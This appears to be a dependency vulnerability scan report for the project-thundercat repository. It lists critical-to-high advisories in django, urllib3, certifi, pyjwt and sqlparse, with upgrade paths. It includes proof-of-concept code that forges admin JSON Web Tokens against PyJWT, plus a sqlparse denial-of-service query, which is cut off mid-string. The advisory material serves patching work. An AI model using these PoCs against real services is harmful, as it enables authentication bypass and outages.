Vulnerabilities	96 via 398 paths
Dependencies	26
Source	GitHub

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications

Issue type

Vulnerabilities
96
License issues
3

Severity

Critical
6
High
29
Medium
53
Low
11

Status

Open
99
Patched
0
Ignored
0

critical severity

Improper Following of a Certificate's Chain of Trust

Vulnerable module: certifi
Introduced through: certifi@2019.3.9, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › certifi@2019.3.9

Remediation: Upgrade to certifi@2023.7.22.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › certifi@2019.3.9

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9

Overview

Affected versions of this package are vulnerable to Improper Following of a Certificate's Chain of Trust. E-Tugra's root certificates are being removed pursuant to an investigation prompted by reporting of security issues in their systems. Conclusions of Mozilla's investigation can be found here.

Note:

This issue is not an inherent vulnerability in the package, but a security measure against potential harmful effects of trusting the now-revoked root certificates.

Remediation

Upgrade certifi to version 2023.7.22 or higher.

References

Improper Following of a Certificate's Chain of Trust vulnerability report

critical severity

SQL Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.28.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to SQL Injection via QuerySet.explain(**options) in option names, using a suitably crafted dictionary, with dictionary expansion, as the **options argument on PostgreSQL.

Remediation

Upgrade Django to version 2.2.28, 3.2.13, 4.0.4 or higher.

References

SQL Injection vulnerability report

critical severity

SQL Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.28.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to SQL Injection in QuerySet.annotate(), aggregate(), and extra() methods, in column aliases, using a suitably crafted dictionary, with dictionary expansion, as the **kwargs passed to these methods.

Remediation

Upgrade Django to version 2.2.28, 3.2.13, 4.0.4 or higher.

References

SQL Injection vulnerability report

critical severity

SQL Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to SQL Injection via the QuerySet.values() and values_list() methods on models with a JSONField. An attacker can exploit this vulnerability through column aliases by using a maliciously crafted JSON object object key as a passed *arg.

Remediation

Upgrade django to version 4.2.15, 5.0.8 or higher.

References

SQL Injection vulnerability report

critical severity

SQL Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.17.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to SQL Injection via the django.db.models.fields.json.HasKey lookup on Oracle, if untrusted data is used as a lhs value. An attacker can manipulate SQL queries and access or alter database information.

Note: Applications that use the jsonfield.has_key lookup through the __ syntax are unaffected.

Remediation

Upgrade django to version 4.2.17, 5.0.10, 5.1.4 or higher.

References

SQL Injection vulnerability report

critical severity

SQL Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@3.2.14.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to SQL Injection via the Trunc(kind) and Extract(lookup_name) arguments, if untrusted data is used as a kind/lookup_name value.

Note: Applications that constrain the lookup name and kind choice to a known safe list are unaffected.

Django 4.1 pre-released versions (4.1a1, 4.1a2) are affected by this issue, please avoid using the 4.1 branch until 4.1.0 is released.

Remediation

Upgrade Django to version 3.2.14, 4.0.6 or higher.

References

SQL Injection vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

Vulnerable module: urllib3
Introduced through: urllib3@1.24.3, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › urllib3@1.24.3

Remediation: Upgrade to urllib3@2.6.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling during the decompression of compressed response data. An attacker can cause excessive CPU and memory consumption by sending responses with a large number of chained compression steps.

Workaround

This vulnerability can be avoided by setting preload_content=False and ensuring that resp.headers["content-encoding"] are limited to a safe quantity before reading.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade urllib3 to version 2.6.0 or higher.

References

GitHub Commit

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

Improper Handling of Highly Compressed Data (Data Amplification)

Vulnerable module: urllib3
Introduced through: urllib3@1.24.3, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › urllib3@1.24.3

Remediation: Upgrade to urllib3@2.6.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) in the Streaming API. The ContentDecoder class can be forced to allocate disproportionate resources when processing a single chunk with very high compression, such as via the stream(), read(amt=256), read1(amt=256), read_chunked(amt=256), and readinto(b) functions.

Note: It is recommended to patch Brotli dependencies (upgrade to at least 1.2.0) if they are installed outside of urllib3 as well, to avoid other instances of the same vulnerability.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade urllib3 to version 2.6.0 or higher.

References

GitHub Commit

Improper Handling of Highly Compressed Data (Data Amplification) vulnerability report

high severity

Improper Handling of Highly Compressed Data (Data Amplification)

Vulnerable module: urllib3
Introduced through: urllib3@1.24.3, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › urllib3@1.24.3

Remediation: Upgrade to urllib3@2.6.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) via the streaming API when handling HTTP redirects. An attacker can cause excessive resource consumption by serving a specially crafted compressed response that triggers decompression of large amounts of data before any read limits are enforced.

Note: This is only exploitable if content is streamed from untrusted sources with redirects enabled.

Workaround

This vulnerability can be mitigated by disabling redirects by setting redirect=False for requests to untrusted sources.

Remediation

Upgrade urllib3 to version 2.6.3 or higher.

References

GitHub Commit

Improper Handling of Highly Compressed Data (Data Amplification) vulnerability report

high severity

new

Improper Authentication

Vulnerable module: pyjwt
Introduced through: pyjwt@1.7.1, djangorestframework-jwt@1.11.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › pyjwt@1.7.1

Remediation: Upgrade to pyjwt@2.13.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-jwt@1.11.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-jwt@1.11.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Improper Authentication when decoding JSON Web Tokens. An attacker can forge valid tokens by supplying a public key as the secret for the HMAC algorithm when both asymmetric and HMAC algorithms are supported.

PoC

from jwt.api_jws import PyJWS
import json, base64, hmac, hashlib

def b64u(b): return base64.urlsafe_b64encode(b).rstrip(b"=")

# Public RSA JWK (public by design)
rsa_jwk_json = json.dumps({"kty":"RSA","n":"AQAB","e":"AQAB"})

# Attacker-crafted token: flip to HS256 and choose claims
header  = b64u(b'{"alg":"HS256","typ":"JWT"}')
payload = b64u(b'{"sub":"alice","admin":true}')
signing = header + b"." + payload

# Sign with HMAC using the PUBLIC JWK JSON TEXT as the “secret”
sig   = hmac.new(rsa_jwk_json.encode(), signing, hashlib.sha256).digest()
token = (signing + b"." + b64u(sig)).decode()

# Vulnerable verifier: mixed families + JWK JSON string as key
jws = PyJWS()
print(jws.decode(token, key=rsa_jwk_json, algorithms=["HS256","RS256"]))
# -> b'{"sub":"alice","admin":true}'

Remediation

Upgrade pyjwt to version 2.13.0 or higher.

References

Improper Authentication vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.20.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the django.utils.text.wrap() function and wordwrap template filter. When either is supplied an excessively long string it may render the application unresponsive.

Remediation

Upgrade django to version 4.2.20, 5.0.13, 5.1.7 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

Inefficient Algorithmic Complexity

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.26.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Inefficient Algorithmic Complexity via the HttpResponseRedirect and HttpResponsePermanentRedirect functions when processing inputs containing a very large number of Unicode characters, due to slow NFKC normalization on Windows. An attacker can cause excessive resource consumption and disrupt service availability.

Note: This is only exploitable on Windows.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade Django to version 4.2.26, 5.1.14, 5.2.8 or higher.

References

Inefficient Algorithmic Complexity vulnerability report

high severity

Inefficient Algorithmic Complexity

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.27.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Inefficient Algorithmic Complexity in the getInnerText() function. An attacker can exhaust CPU and memory resources by submitting deeply nested XML input to the XML deserializer, which is processed in quadratic time per character.

Remediation

Upgrade Django to version 4.2.27, 5.1.15, 5.2.9 or higher.

References

Inefficient Algorithmic Complexity vulnerability report

high severity

Improper Verification of Cryptographic Signature

Vulnerable module: pyjwt
Introduced through: pyjwt@1.7.1, djangorestframework-jwt@1.11.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › pyjwt@1.7.1

Remediation: Upgrade to pyjwt@2.12.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-jwt@1.11.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-jwt@1.11.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to improper validation of the crit header parameter. An attacker can bypass critical header checks by crafting a JSON Web Signature (JWS) token with unrecognized critical extensions.

PoC

import jwt  # PyJWT 2.8.0
import hmac, hashlib, base64, json

# Construct token with unknown critical extension
header = {"alg": "HS256", "crit": ["x-custom-policy"], "x-custom-policy": "require-mfa"}
payload = {"sub": "attacker", "role": "admin"}

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

h = b64url(json.dumps(header, separators=(",", ":")).encode())
p = b64url(json.dumps(payload, separators=(",", ":")).encode())
sig = b64url(hmac.new(b"secret", f"{h}.{p}".encode(), hashlib.sha256).digest())
token = f"{h}.{p}.{sig}"

# Should REJECT — x-custom-policy is not understood by PyJWT
try:
    result = jwt.decode(token, "secret", algorithms=["HS256"])
    print(f"ACCEPTED: {result}")
    # Output: ACCEPTED: {'sub': 'attacker', 'role': 'admin'}
except Exception as e:
    print(f"REJECTED: {e}")

Remediation

Upgrade pyjwt to version 2.12.0 or higher.

References

Improper Verification of Cryptographic Signature vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

Vulnerable module: sqlparse
Introduced through: sqlparse@0.3.0 and django-debug-toolbar@1.11

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › sqlparse@0.3.0

Remediation: Upgrade to sqlparse@0.5.4.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › sqlparse@0.3.0

Remediation: Upgrade to django-debug-toolbar@3.2.3.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via algorithmic complexity in the SQL parsing logic. The parser fails to enforce limits when handling deeply nested tuples or unusually large token sequences, allowing an attacker to submit crafted SQL statements with extreme nesting depth or token counts. This causes excessive CPU and memory consumption, leading to service slowdown or outage.

Note: This vulnerability exists due to an incomplete fix for CVE-2024-4340.

PoC

import sqlparse

sql = """
SELECT "composite_pk_comment"."tenant_id", "composite_pk_comment"."comment_id", "composite_pk_comment"."user_id", "composite_pk_comment"."text", "composite_pk_comment"."integer" FROM "composite_pk_comment" WHERE ("composite_pk_comment"."tenant_id", "composite_pk_comment"."comment_id") IN ((1, 1), (1, 2), (1, 3), (1, 4), (1, 5), (1, 6), (1, 7), (1, 8), (1, 9), (1, 10), (1, 11), (1, 12), (1, 13), (1, 14), (1, 15), (1, 16), (1, 17), (1, 18), (1, 19), (1, 20), (1, 21), (1, 22), (1, 23), (1, 24), (1, 25), (1, 26), (1, 27), (1, 28), (1, 29), (1, 30), (1, 31), (1, 32), (1, 33), (1, 34), (1, 35), (1, 36), (1, 37), (1, 38), (1, 39), (1, 40), (1, 41), (1, 42), (1, 43), (1, 44), (1, 45), (1, 46), (1, 47), (1, 48), (1, 49), (1, 50), (1, 51), (1, 52), (1, 53), (1, 54), (1, 55), (1, 56), (1, 57), (1, 58), (1, 59), (1, 60), (1, 61), (1, 62), (1, 63), (1, 64), (1, 65), (1, 66), (1, 67), (1, 68), (1, 69), (1, 70), (1, 71), (1, 72), (1, 73), (1, 74), (1, 75), (1, 76), (1, 77), (1, 78), (1, 79), (1, 80), (1, 81), (1, 82), (1, 83), (1, 84), (1, 85), (1, 86), (1, 87), (1, 88), (1, 89), (1, 90), (1, 91), (1, 92), (1, 93), (1, 94), (1, 95), (1, 96), (1, 97), (1, 98), (1, 99), (1, 100), (1, 101), (1, 102), (1, 103), (1, 104), (1, 105), (1, 106), (1, 107), (1, 108), (1, 109), (1, 110), (1, 111), (1, 112), (1, 113), (1, 114), (1, 115), (1, 116), (1, 117), (1, 118), (1, 119), (1, 120), (1, 121), (1, 122), (1, 123), (1, 124), (1, 125), (1, 126), (1, 127), (1, 128), (1, 129), (1, 130), (1, 131), (1, 132), (1, 133), (1, 134), (1, 135), (1, 136), (1, 137), (1, 138), (1, 139), (1, 140), (1, 141), (1, 142), (1, 143), (1, 144), (1, 145), (1, 146), (1, 147), (1, 148), (1, 149), (1, 150), (1, 151), (1, 152), (1, 153), (1, 154), (1, 155), (1, 156), (1, 157), (1, 158), (1, 159), (1, 160), (1, 161), (1, 162), (1, 163), (1, 164), (1, 165), (1, 166), (1, 167), (1, 168), (1, 169), (1, 170), (1, 171), (1, 172), (1, 173), (1, 174), (1, 175), (1, 176), (1, 177), (1, 178), (1, 179), (1, 180), (1, 181), (1, 182), (1, 183), (1, 184), (1, 185), (1, 186), (1, 187), (1, 188), (1, 189), (1, 190), (1, 191), (1, 192), (1, 193), (1, 194), (1, 195), (1, 196), (1, 197), (1, 198), (1, 199), (1, 200), (1, 201), (1, 202), (1, 203), (1, 204), (1, 205), (1, 206), (1, 207), (1, 208), (1, 209), (1, 210), (1, 211), (1, 212), (1, 213), (1, 214), (1, 215), (1, 216), (1, 217), (1, 218), (1, 219), (1, 220), (1, 221), (1, 222), (1, 223), (1, 224), (1, 225), (1, 226), (1, 227), (1, 228), (1, 229), (1, 230), (1, 231), (1, 232), (1, 233), (1, 234), (1, 235), (1, 236), (1, 237), (1, 238), (1, 239), (1, 240), (1, 241), (1, 242), (1, 243), (1, 244), (1, 245), (1, 246), (1, 247), (1, 248), (1, 249), (1, 250), (1, 251), (1, 252), (1, 253), (1, 254), (1, 255), (1, 256), (1, 257), (1, 258), (1, 259), (1, 260), (1, 261), (1, 262), (1, 263), (1, 264), (1, 265), (1, 266), (1, 267), (1, 268), (1, 269), (1, 270), (1, 271), (1, 272), (1, 273), (1, 274), (1, 275), (1, 276), (1, 277), (1, 278), (1, 279), (1, 280), (1, 281), (1, 282), (1, 283), (1, 284), (1, 285), (1, 286), (1, 287), (1, 288), (1, 289), (1, 290), (1, 291), (1, 292), (1, 293), (1, 294), (1, 295), (1, 296), (1, 297), (1, 298), (1, 299), (1, 300), (1, 301), (1, 302), (1, 303), (1, 304), (1, 305), (1, 306), (1, 307), (1, 308), (1, 309), (1, 310), (1, 311), (1, 312), (1, 313), (1, 314), (1, 315), (1, 316), (1, 317), (1, 318), (1, 319), (1, 320), (1, 321), (1, 322), (1, 323), (1, 324), (1, 325), (1, 326), (1, 327), (1, 328), (1, 329), (1, 330), (1, 331), (1, 332), (1, 333), (1, 334), (1, 335), (1, 336), (1, 337), (1, 338), (1, 339), (1, 340), (1, 341), (1, 342), (1, 343), (1, 344), (1, 345), (1, 346), (1, 347), (1, 348), (1, 349), (1, 350), (1, 351), (1, 352), (1, 353), (1, 354), (1, 355), (1, 356), (1, 357), (1, 358), (1, 359), (1, 360), (1, 361), (1, 362), (1, 363), (1, 364), (1, 365), (1, 366), (1, 367), (1, 368), (1, 369), (1, 370), (1, 371), (1, 372), (1, 373), (1, 374), (1, 375), (1, 376), (1, 377), (1, 378), (1, 379), (1, 380), (1, 381), (1, 382), (1, 383), (1, 384), (1, 385), (1, 386), (1, 387), (1, 388), (1, 389), (1, 390), (1, 391), (1, 392), (1, 393), (1, 394), (1, 395), (1, 396), (1, 397), (1, 398), (1, 399), (1, 400), (1, 401), (1, 402), (1, 403), (1, 404), (1, 405), (1, 406), (1, 407), (1, 408), (1, 409), (1, 410), (1, 411), (1, 412), (1, 413), (1, 414), (1, 415), (1, 416), (1, 417), (1, 418), (1, 419), (1, 420), (1, 421), (1, 422), (1, 423), (1, 424), (1, 425), (1, 426), (1, 427), (1, 428), (1, 429), (1, 430), (1, 431), (1, 432), (1, 433), (1, 434), (1, 435), (1, 436), (1, 437), (1, 438), (1, 439), (1, 440), (1, 441), (1, 442), (1, 443), (1, 444), (1, 445), (1, 446), (1, 447), (1, 448), (1, 449), (1, 450), (1, 451), (1, 452), (1, 453), (1, 454), (1, 455), (1, 456), (1, 457), (1, 458), (1, 459), (1, 460), (1, 461), (1, 462), (1, 463), (1, 464), (1, 465), (1, 466), (1, 467), (1, 468), (1, 469), (1, 470), (1, 471), (1, 472), (1, 473), (1, 474), (1, 475), (1, 476), (1, 477), (1, 478), (1, 479), (1, 480), (1, 481), (1, 482), (1, 483), (1, 484), (1, 485), (1, 486), (1, 487), (1, 488), (1, 489), (1, 490), (1, 491), (1, 492), (1, 493), (1, 494), (1, 495), (1, 496), (1, 497), (1, 498), (1, 499), (1, 500), (1, 501), (1, 502), (1, 503), (1, 504), (1, 505), (1, 506), (1, 507), (1, 508), (1, 509), (1, 510), (1, 511), (1, 512), (1, 513), (1, 514), (1, 515), (1, 516), (1, 517), (1, 518), (1, 519), (1, 520), (1, 521), (1, 522), (1, 523), (1, 524), (1, 525), (1, 526), (1, 527), (1, 528), (1, 529), (1, 530), (1, 531), (1, 532), (1, 533), (1, 534), (1, 535), (1, 536), (1, 537), (1, 538), (1, 539), (1, 540), (1, 541), (1, 542), (1, 543), (1, 544), (1, 545), (1, 546), (1, 547), (1, 548), (1, 549), (1, 550), (1, 551), (1, 552), (1, 553), (1, 554), (1, 555), (1, 556), (1, 557), (1, 558), (1, 559), (1, 560), (1, 561), (1, 562), (1, 563), (1, 564), (1, 565), (1, 566), (1, 567), (1, 568), (1, 569), (1, 570), (1, 571), (1, 572), (1, 573), (1, 574), (1, 575), (1, 576), (1, 577), (1, 578), (1, 579), (1, 580), (1, 581), (1, 582), (1, 583), (1, 584), (1, 585), (1, 586), (1, 587), (1, 588), (1, 589), (1, 590), (1, 591), (1, 592), (1, 593), (1, 594), (1, 595), (1, 596), (1, 597), (1, 598), (1, 599), (1, 600), (1, 601), (1, 602), (1, 603), (1, 604), (1, 605), (1, 606), (1, 607), (1, 608), (1, 609), (1, 610), (1, 611), (1, 612), (1, 613), (1, 614), (1, 615), (1, 616), (1, 617), (1, 618), (1, 619), 